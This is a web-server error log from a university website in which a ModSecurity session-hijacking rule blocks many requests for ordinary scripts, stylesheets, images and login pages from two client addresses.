[Mon Aug 28 07:17:00.884873 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOvnfMCo-f0AAJIZStgAAAAF"]
[Mon Aug 28 07:17:00.923190 2023] [:error] [pid 37619] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOvnfMCo-f0AAJLzWXUAAAAC"]
[Mon Aug 28 07:17:00.923541 2023] [:error] [pid 37312] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOvnfMCo-f0AAJHAlDwAAAAY"]
[Mon Aug 28 07:17:00.923729 2023] [:error] [pid 37721] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOvnfMCo-f0AAJNZd@4AAAAJ"]
[Mon Aug 28 07:17:00.926428 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOvnfMCo-f0AAJN@71oAAAAE"]
[Mon Aug 28 07:17:00.926529 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOvnfMCo-f0AAJIZStkAAAAF"]
[Mon Aug 28 07:17:00.926806 2023] [:error] [pid 37759] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOvnfMCo-f0AAJN-mxcAAAAI"]
[Mon Aug 28 07:17:00.952169 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOvnfMCo-f0AAJLwX04AAAAB"]
[Mon Aug 28 07:17:00.952190 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOvnfMCo-f0AAJLyEXsAAAAH"]
[Mon Aug 28 07:17:00.953291 2023] [:error] [pid 37759] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOvnfMCo-f0AAJN-mxgAAAAI"]
[Mon Aug 28 07:17:00.955099 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOvnfMCo-f0AAJIZStoAAAAF"]
[Mon Aug 28 07:17:00.958788 2023] [:error] [pid 37619] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOvnfMCo-f0AAJLzWXYAAAAC"]
[Mon Aug 28 07:17:00.960008 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOvnfMCo-f0AAJN@71sAAAAE"]
[Mon Aug 28 07:17:00.982139 2023] [:error] [pid 37721] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOvnfMCo-f0AAJNZd@8AAAAJ"]
[Mon Aug 28 07:17:01.074626 2023] [:error] [pid 37759] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOvnfcCo-f0AAJN-mxkAAAAI"]
[Mon Aug 28 07:17:01.077355 2023] [:error] [pid 37451] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOvnfcCo-f0AAJJLqZwAAAAA"]
[Mon Aug 28 07:17:01.077512 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOvnfcCo-f0AAJIZStsAAAAF"]
[Mon Aug 28 07:17:01.115812 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOvnfcCo-f0AAJLyEXwAAAAH"]
[Mon Aug 28 07:17:01.119137 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOvnfcCo-f0AAJLwX08AAAAB"]
[Mon Aug 28 07:17:01.121555 2023] [:error] [pid 37759] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOvnfcCo-f0AAJN-mxoAAAAI"]
[Mon Aug 28 07:17:01.164546 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOvnfcCo-f0AAJIZStwAAAAF"]
[Mon Aug 28 07:17:01.165219 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOvnfcCo-f0AAJN@71wAAAAE"]
[Mon Aug 28 07:17:01.165274 2023] [:error] [pid 37759] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOvnfcCo-f0AAJN-mxsAAAAI"]
[Mon Aug 28 07:17:01.201374 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOvnfcCo-f0AAJLwX1AAAAAB"]
[Mon Aug 28 07:17:01.202854 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOvnfcCo-f0AAJIZSt0AAAAF"]
[Mon Aug 28 07:17:01.202925 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOvnfcCo-f0AAJLyEX0AAAAH"]
[Mon Aug 28 07:17:01.239073 2023] [:error] [pid 37451] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOvnfcCo-f0AAJJLqZ0AAAAA"]
[Mon Aug 28 07:17:01.239642 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOvnfcCo-f0AAJLyEX4AAAAH"]
[Mon Aug 28 07:17:01.276642 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOvnfcCo-f0AAJLwX1EAAAAB"]
[Mon Aug 28 07:17:01.278359 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOvnfcCo-f0AAJIZSt4AAAAF"]
[Mon Aug 28 07:17:01.311038 2023] [:error] [pid 37721] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOvnfcCo-f0AAJNZd-AAAAAJ"]
[Mon Aug 28 07:17:01.490932 2023] [:error] [pid 37619] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOvnfcCo-f0AAJLzWXcAAAAC"]
[Mon Aug 28 07:17:01.492412 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOvnfcCo-f0AAJN@710AAAAE"]
[Mon Aug 28 07:17:01.544100 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/no-profile-image.jpg"] [unique_id "ZOvnfcCo-f0AAJIZSt8AAAAF"]
[Mon Aug 28 07:17:01.551722 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/deny_haspada.jpg"] [unique_id "ZOvnfcCo-f0AAJLyEX8AAAAH"]
[Mon Aug 28 07:17:01.557649 2023] [:error] [pid 37539] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOvnfcCo-f0AAJKjZYQAAAAG"]
[Mon Aug 28 07:17:01.696480 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/Msn-Buddy-web-icon.png"] [unique_id "ZOvnfcCo-f0AAJN@714AAAAE"]
[Mon Aug 28 07:17:01.699004 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOvnfcCo-f0AAJLwX1IAAAAB"]
[Mon Aug 28 07:17:01.711711 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/Pas_Foto.jpg"] [unique_id "ZOvnfcCo-f0AAJIZSuAAAAAF"]
[Mon Aug 28 07:17:01.740710 2023] [:error] [pid 37619] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/IMG_20160613_100811.jpg"] [unique_id "ZOvnfcCo-f0AAJLzWXgAAAAC"]
[Mon Aug 28 07:17:01.747610 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOvnfcCo-f0AAJLyEYAAAAAH"]
[Mon Aug 28 07:17:01.793045 2023] [:error] [pid 37539] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOvnfcCo-f0AAJKjZYUAAAAG"]
[Mon Aug 28 07:17:01.835173 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOvnfcCo-f0AAJLyEYEAAAAH"]
[Mon Aug 28 07:17:01.874384 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOvnfcCo-f0AAJN@718AAAAE"]
[Mon Aug 28 07:17:01.963202 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOvnfcCo-f0AAJLwX1MAAAAB"]
[Mon Aug 28 07:17:02.032237 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOvnfsCo-f0AAJLyEYIAAAAH"]
[Mon Aug 28 07:17:02.089495 2023] [:error] [pid 37759] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOvnfsCo-f0AAJN-mxwAAAAI"]
[Mon Aug 28 07:17:02.240336 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOvnfsCo-f0AAJLwX1QAAAAB"]
[Mon Aug 28 07:17:02.375261 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOvnfsCo-f0AAJIZSuEAAAAF"]
[Mon Aug 28 07:17:02.426899 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/no-profile-image.jpg"] [unique_id "ZOvnfsCo-f0AAJN@72AAAAAE"]
[Mon Aug 28 07:17:02.431274 2023] [:error] [pid 37721] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/deny_haspada.jpg"] [unique_id "ZOvnfsCo-f0AAJNZd-EAAAAJ"]
[Mon Aug 28 07:17:02.457051 2023] [:error] [pid 37539] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/Pas_Foto.jpg"] [unique_id "ZOvnfsCo-f0AAJKjZYYAAAAG"]
[Mon Aug 28 07:17:02.463205 2023] [:error] [pid 37313] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/Msn-Buddy-web-icon.png"] [unique_id "ZOvnfsCo-f0AAJHB4@AAAAAD"]
[Mon Aug 28 07:17:02.515413 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/o_dosen/IMG_20160613_100811.jpg"] [unique_id "ZOvnfsCo-f0AAJN@72EAAAAE"]
[Mon Aug 28 07:28:43.691248 2023] [:error] [pid 37806] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvqO8Co-f0AAJOuUPAAAAAO"]
[Mon Aug 28 07:28:43.791112 2023] [:error] [pid 37619] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvqO8Co-f0AAJLzWmkAAAAC"]
[Mon Aug 28 07:28:43.791226 2023] [:error] [pid 37844] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvqO8Co-f0AAJPUAVQAAAAA"]
[Mon Aug 28 07:28:43.951234 2023] [:error] [pid 37803] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvqO8Co-f0AAJOr9f0AAAAL"]
[Mon Aug 28 07:28:44.482996 2023] [:error] [pid 37616] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvqPMCo-f0AAJLwYFEAAAAB"]
[Mon Aug 28 07:28:49.691348 2023] [:error] [pid 37619] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvqQcCo-f0AAJLzWmsAAAAC"]
[Mon Aug 28 07:28:54.272599 2023] [:error] [pid 37312] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvqRsCo-f0AAJHAlSoAAAAY"]
